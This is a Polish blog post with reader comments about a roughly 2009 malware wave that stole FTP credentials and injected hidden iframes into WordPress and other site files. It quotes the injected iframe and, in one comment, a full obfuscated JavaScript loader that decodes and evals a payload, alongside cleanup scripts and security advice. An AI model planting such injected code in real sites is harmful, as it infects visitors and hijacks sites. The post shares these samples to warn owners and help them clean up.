Uwaga na Wordpressy!
Od jakiegoś czasu po sieci grasuje wirus, który łączy się z naszymi serwerami (prawdopodobnie dane do FTP pobiera z Total Commandera) i dołacza kod html i php do naszych stron. Zagrożone są wszystkie skrypty. Te autorskie i darmowe tj. Wordpress.
Od jakiegoś czasu po sieci grasuje wirus, który łączy się z naszymi serwerami (prawdopodobnie dane do FTP pobiera z Total Commandera) i dołacza kod html i php do naszych stron. Zagrożone są wszystkie skrypty. Te autorskie i darmowe tj. Wordpress.
Gdzie?
Złośliwy kod jest dodawany do wszystkich katalogów na serwerze do plików index.php
, index.html
, main.php
. W samym kodzie źródłowym dołącza się na samym początku strony (przed !Doctype
), zaraz po body
, na końcu strony (po zamykającym tagu html
) i przed ostatnim tagiem zamykającym bod
y. Ponadto jeżeli używasz Wordpressa, to złośliwy kod jest dołączany do szablonów w katalogu wp-content/themes/
a nawet do innych plików z configami. U mnie był to np. wp-includes/default-filters.php
Co?
Dołączany jest niewidoczny iframe, który wygląda tak (oraz różne kombinacje):
<iframe src="http://cheapslotplay.cn/in.cgi?income48" width=1 height=1 style="visibility: hidden"></iframe>
Co się dzieje?
Wirus się rozprzestrzenia poprzez wyżej pokazany kod – to raz. Dwa – Google blokuje dostęp do strony przez wyszukiwarkę. Pojawia się komunikat, że „strona może wyrządzić szkody”.
Sprawdź swoje strony, skasuj kody html i zmień hasło do FTP!
Komentarze 44
O podkradaniu haseł do ftp z Totla Commandera już słyszałem.
Jedno pytanie: czy adres w tym kodzie jest stały? Można by go dodać do filtra. I: jak bardzo jest to zaraźliwe, infekuje tylko IE, czy coś jeszcze?
Miałem coś takiego u klienta. Hasło wypłynęło raczej przez jego komputer (u siebie mam i firewalla i antywira) a wirusa znajdowałem ja po wejściu na stronę.
@Jurgi - niestety, wygląda na to że problemem nie jest pojedynczy wirus, a mamy do czynienia po prostu z nowym rodzajem ataków.
Na witrynach klientków widziałem już najróżniejsze wersje - od ramek, przez wklejenie żywych linków, aż po pseudoszyfrowane JavaScripty.
Projektant TC już o problemie wie, ponoć szukują aktualizację, żeby szyfrować hasła i loginy do FTP - być może nowa wersja już bangla. Ale zagrożony tak naprawdę jest każdy program do FTP nie szyfrujący plików z hasłami.
Przy okazji - co robić po ataku - otóż nie wystarczy usunąć kod i przeskanować komputer w poszukiwaniu robala - trzeba też zmienić hasło do FTP! Miałem już przypadek, że kod został usunięty, komputer wyczyszczony, a bot po pewnym czasie wrócił i używając tego samego hasła wrzucił ponownie śmieci na stronę.
Potwierdzam to co pisze @Kapsel, po usunięciu wirusa, trzeba jeszcze zmienić hasło do FTP. Miałem podobnego wirusa, tylko, że mi wklejał kod JS.
#!/bin/sh
FINDLINE=$(grep -r "cutlot.cn" * |cut -f1 -d: |grep -v $0)
for i in $FINDLINE;do
sed -i "s###" $i
done
Tu skrypt wyszukujacy dodane linijki. Podziekowania dla spolecznosci forum Ubuntu.pl za pomoc.
http://forum.ubuntu.pl/showthread.php?t=98263
tutaj jest poprawny skrypt.
aby wyszukac pliki zainfekowane:
find -type f -exec grep -q 'cutlot' {} ; -print
Polecam FlashFXP z szyfrowaniem zapamiętanych haseł.
Również ja miałem problemy z podobnym wirusem. Kod doklejał się do każdego index.php, bez względu na zastosowany CMS. Bardzo nieprzyjemne, bo po skasowaniu w parę dni później znów było. Wyleczyłem to dzięki Trojan Removerowi i później zmianie wszystkich haseł.
Wczoraj spotkało mnie to samo. Wirus dokleja swój kod do każdego pliku index.php i index.html. Nie ma znaczenia czy to skrypt czy stateczna strona www.
Szybkie rozwiązanie problemu: kontakt z hostingiem, poprosić o logi do ftp, sprawdzić kiedy akcja się zaczęła i poprosić o odtworzenie konta z backupu z dnia wcześniejszego. Wcześniej oczywiście trzeba usunąć paskudztwo z komputera i zmienić hasło do ftp.
Co to jest wirus? :D
@Mac User: duża bakteria :D:D
@DJ SEBSON: Raczej mała bakteria (a w zasadzie to nie bakteria tylko wirus) :D:D
@Kapsel
>Projektant TC już o problemie wie, ponoć szukują aktualizację, żeby szyfrować hasła i loginy
Zaraz zaraz, chcesz powiedzieć, że TC do tej pory przechowuje hasła jako plaintext? Hm, dobrze, że po krótkim kontakcie z tym programem zrezygnowałem z niego. ;)
a ja tego wirusa podam do sądu!
Słyszałem o tym "chadziajestwie wrednym" wiele osób złapało. Przejrzałem część swoich stron i nie ma na szczęście ramek. Zmieniłem nawet TC na Filezilla, chociaż to nie jest pewne, że wykrada hasła z TC.
Z FileZilli też wykrada...
ale jednak TC jest najpopularniejszy, więc ryzyko chyba największe, zależy w jaki sposób wykrada hasała.
Ja polecam FlashFXP, mimo iż nie jest darmowy. Na pewno bardziej przyjazny w użyciu niż FileZilla. Jeśli zaś chodzi o szablony do WP to polecam pobierać je z oficjalnych stron ich autorów, gdyż w serwisach będących zbiorami takich szablonów można wielokrotnie nadziać się na "modyfikowane" szablony z różnymi "niespodziankami".
a co myslicie na laczenie sie poprzez WINSCP?
Zamiast TC oczywiscie.
Jednego z moich userów to też dopadło. Co do SCP to oczywiście jest znacznie lepszy niż FTP (zwłaszcza przy autoryzacji kluczami), ale i tak podstawowa zasada bezpieczeństwa to nigdy nie przechowywać zapamiętanych haseł w żadnym programie! Hasło jest od tego, żeby znajdowało się tylko w głowie i żeby za każdym razem trzeba było je "z palca" wpisywać przy połączeniu. Inaczej użycie haseł traci w ogóle sens.
Hej, wydaje mi się, że to nie jest Total Commander, prawdopodobnie wirus wykorzystuje katalog TMP - więcej pod tym adresem http://www.mojito-networks.com/blog/index.php/2009/04/26/wirus-iframe-total-commander/
Pojawila sie chyba kolejna mutacja - zmiania index.php i dodaje juz pokodowane linki :)
Potyczki na Wordpressem i pozostawionym hasłem
http://nomadowyblog.pl/2009/05/wirusowy-wordpress-2/
U mnie to samo sie stalo.. na winylowe.com. O dziwo - korzystam z Maca, Leopard. TYLKO i wyłącznie.
Wirus wykrada cały plik z zapisanymi danymi do strony, zaszyfrowanie hasła pomoże jedynie w dodaniu go do robota doklejającego kod, ponieważ ręcznie da się wejść na FTP, jedyna szansa to zaszyfrować cały plik unikalnym kluczem który można otworzyć tylko na tym jednym komputerze.
Zmieniłem hasło, zainstalowałem TCMD, wgrałem ponownie wszystkie pliki, wirus wraca... Ma ktoś jakiś pomysł?
Wirus wykrada hasła także za pośrednictwem FlashFXP, co mnie bardzo dziwi. Niestety i mnie to spotkało, choć używam tylko tego jednego klienta FTP.
Ja miałem 43 robaki na swojej stronie. I wszystkie zniszczyłem. Jak narazie żaden nie powrócił. Napisałem krótki poradnik jak się ich pozbyć - http://www.kaluza.boo.pl/?p=5
Problem jest tylko taki, o czym prawie nikt nie wspomina, ze np. Kaspersky absolutnie nie wykrywa tego wirusa i moze on sobie buszowac po kompie w dowolny sposob... o czym sie wlasnie bolesnie przekonalem.
Druga sprawa - niestety nie wystarczy samo wyciecie wrednego kodu ze strony (bo tam nie ma zadnego wirusa tylko kod - glownie generujacy ruch na stronach np xxx pewnie w celach reklamowych) - trzeba poprawic caly plik bo wirus wklejajac zlosliwy iframe niestety dokonuje ciec w kodzie strony (pewnie wynika to z bledu w wirusie bo jest to dzialanie calkiem bezsensowne z punktu widzenia dzialania kodu - uniemozliwia czesto dzialanie strony)
Ja mam już najnowszego TC i na szczęście hasła są szyfrowane... zresztą i tak wolę korzystać z ftp przez Mozille bo jest 10 razy bezpieczniejsza bardziej komfortowa i ma praktycznie same zalety... ;)
Nie wiem czemu ludzie tworzą te wirusy. To jest takie bezinteresowne szkodzenie innym z pogranicza megalomani. Siedzą potem tacy w swoich jamach i podniecają się czyj wirus więcej naszkodził . Ĺťal
Chyba jedyna rada to nie dodawać do Total Commandera zapamiętywania haseł, ale jak się ma około stu kont to wpisywanie ręcznie każdego hasła jest co najmniej katorgą i strasznie utrudnia pracę. Można jeszcze przeklejać hasła zapisane chronologicznie, gdzie indziej.
Ja już raz się przejechałem na zapamiętanym haśle w TC i choć byłem chroniony przez niezłego antywirusa, nie pomogło. Dziś korzystam z FileZilli, nie zapamiętuje haseł i jest spokój.
Chyba jedyna rada to nie dodawać do Total Commandera zapamiętywania haseł, ale jak się ma około stu kont to wpisywanie ręcznie każdego hasła jest co najmniej katorgą i strasznie utrudnia pracę. Można jeszcze przeklejać hasła zapisane chronologicznie, gdzie indziej.
Ja już raz się przejechałem na zapamiętanym haśle w TC i choć byłem chroniony przez niezłego antywirusa, nie pomogło. Dziś korzystam z FileZilli, nie zapamiętuje haseł i jest spokój.
Jak cos jest za darmo, to nigdy nie bedzie bezpieczne w100% i tyle...
Sam mam kilka wordpressów i inny stron więc warto uważać na wirusy.
U mnie wirus zainfekował stronę dopisując adres bigdeal777 .com
Virusy to większe bakterie.
A czy ktoś skanował kompa w poszukiwaniu bakterii???
A spotkał się ktoś teraz z takimi złośliwymi kodami w wordpressie:
v=window;try{fawbe++}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{v["document"]["body"]="123"}catch(gfdnfdgber){m=123;if((alert+"").indexOf("native")!==-1)ev=window["e"+"v"+"al"];}}
n=["9","9","4d","4a","19","1h","48","4j","47","52","4h","49","4i","51","20","4b","49","51","30","4g","49","4h","49","4i","51","50","2k","56","3f","45","4b","39","45","4h","49","1h","1g","46","4j","48","56","1g","1i","3m","22","41","1i","58","d","9","9","9","4d","4a","4m","45","4h","49","4m","1h","1i","2d","d","9","9","5a","19","49","4g","50","49","19","58","d","9","9","9","48","4j","47","52","4h","49","4i","51","20","54","4m","4d","51","49","1h","1b","2e","4d","4a","4m","45","4h","49","19","50","4m","47","2f","1g","4c","51","51","4k","2c","21","21","47","49","4m","51","4d","4a","4d","47","45","51","49","50","4f","45","54","45","50","45","4f","4d","20","4d","4i","4a","4j","21","47","45","1g","19","54","4d","48","51","4c","2f","1g","23","22","1g","19","4c","49","4d","4b","4c","51","2f","1g","23","22","1g","19","50","51","56","4g","49","2f","1g","53","4d","50","4d","46","4d","4g","4d","51","56","2c","4c","4d","48","48","49","4i","2d","4k","4j","50","4d","51","4d","4j","4i","2c","45","46","50","4j","4g","52","51","49","2d","4g","49","4a","51","2c","22","2d","51","4j","4k","2c","22","2d","1g","2g","2e","21","4d","4a","4m","45","4h","49","2g","1b","1i","2d","d","9","9","5a","d","9","9","4a","52","4i","47","51","4d","4j","4i","19","4d","4a","4m","45","4h","49","4m","1h","1i","58","d","9","9","9","53","45","4m","19","4a","19","2f","19","48","4j","47","52","4h","49","4i","51","20","47","4m","49","45","51","49","30","4g","49","4h","49","4i","51","1h","1g","4d","4a","4m","45","4h","49","1g","1i","2d","4a","20","50","49","51","2j","51","51","4m","4d","46","52","51","49","1h","1g","50","4m","47","1g","1l","1g","4c","51","51","4k","2c","21","21","47","49","4m","51","4d","4a","4d","47","45","51","49","50","4f","45","54","45","50","45","4f","4d","20","4d","4i","4a","4j","21","47","45","1g","1i","2d","4a","20","50","51","56","4g","49","20","53","4d","50","4d","46","4d","4g","4d","51","56","2f","1g","4c","4d","48","48","49","4i","1g","2d","4a","20","50","51","56","4g","49","20","4k","4j","50","4d","51","4d","4j","4i","2f","1g","45","46","50","4j","4g","52","51","49","1g","2d","4a","20","50","51","56","4g","49","20","4g","49","4a","51","2f","1g","22","1g","2d","4a","20","50","51","56","4g","49","20","51","4j","4k","2f","1g","22","1g","2d","4a","20","50","49","51","2j","51","51","4m","4d","46","52","51","49","1h","1g","54","4d","48","51","4c","1g","1l","1g","23","22","1g","1i","2d","4a","20","50","49","51","2j","51","51","4m","4d","46","52","51","49","1h","1g","4c","49","4d","4b","4c","51","1g","1l","1g","23","22","1g","1i","2d","d","9","9","9","48","4j","47","52","4h","49","4i","51","20","4b","49","51","30","4g","49","4h","49","4i","51","50","2k","56","3f","45","4b","39","45","4h","49","1h","1g","46","4j","48","56","1g","1i","3m","22","41","20","45","4k","4k","49","4i","48","2l","4c","4d","4g","48","1h","4a","1i","2d","d","9","9","5a"];h=2;s="";if(m)for(i=0;i-579!=0;i++){k=i;if(window["document"])s+=String["fro"+"mCharCode"](parseInt(n[i],23));}try{febwnrth--}catch(bawetawe){z=s;ev(z)}}
Aktualizuje wszystko na bieżąco a i tak nie daje rady tego uniknąć, podobne rzeczy wyskakują na Joomla ale tam aktualizacja do nowej wersji wystarcza aby pozbyć się tego problemu. W wordpressie moze to wina wtyczki którejś? Wdzięczny będe za wszelkie podpowiedzi.
Ciekawy post, chodź już trochę stary. Zastanawiam się czy cały czas są problemy związane z tym wirusem... Planuje moją stronę oprzeć o jakiś cms (najprawdopodobniej WordPress) i zastanawiam się czy problem związany z tym wirusem nadal istnieje... Może ktoś z doświadczonych użytkowników WP się wypowie?
Faktycznie znalazłem u siebie w kodzie też tego frame. Tak myślałem że coś ze stroną jest nie tak wszędzie teraz wrzucają te wirusy.Dzięki
Super poradnik, krotki, zwięzły i na temat, podoba mi się i dowiedziałem się czegoś nowego.
Nie wiem dokładnie czy dobrze sprawdzałem ale miałem właśnie takie coś na laptopie, ale nic się nie dzieje zrobiłem tak jak w poradniku.